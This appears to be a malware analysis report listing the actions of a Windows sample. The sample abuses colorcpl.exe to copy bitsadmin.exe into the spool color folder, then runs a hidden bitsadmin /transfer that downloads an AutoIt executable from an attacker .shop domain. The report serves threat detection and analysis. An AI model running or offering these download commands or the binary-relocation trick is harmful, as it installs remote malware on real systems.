Technical Information
Malicious functions
Creates and executes the following
- '<SYSTEM32>\spool\drivers\color\bitsadmin.exe' /transfer 38824423749 /priority foreground http://k7mr9rsier6.hugoeyagomucasltda.shop/?39381921611628757 "C:\Z35466700421\TYAN.ImController.2022.3805.425.AutoIt3.exe"
Modifies file system
Creates the following files
- C:\users\public\pv
- <SYSTEM32>\spool\drivers\color\bitsadmin.exe
Network activity
UDP
- DNS ASK k7########6.hugoeyagomucasltda.shop
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /V /C "echo C:\Z35466700421\>C:\Users\Public\pv"&& exit
- '<SYSTEM32>\colorcpl.exe' C:\\Windows\\System32\\bitsadmin.exe
- '<SYSTEM32>\bitsadmin.exe' /reset
- '<SYSTEM32>\cmd.exe' /V /C "echo C:\Z35466700421\>C:\Users\Public\pv"&& exit' (with hidden window)
- '<SYSTEM32>\colorcpl.exe' C:\\Windows\\System32\\bitsadmin.exe' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /reset' (with hidden window)
- '<SYSTEM32>\spool\drivers\color\bitsadmin.exe' /transfer 38824423749 /priority foreground http://k7mr9rsier6.hugoeyagomucasltda.shop/?39381921611628757 "C:\Z35466700421\TYAN.ImController.2022.3805.425.AutoIt3.exe"' (with hidden window)
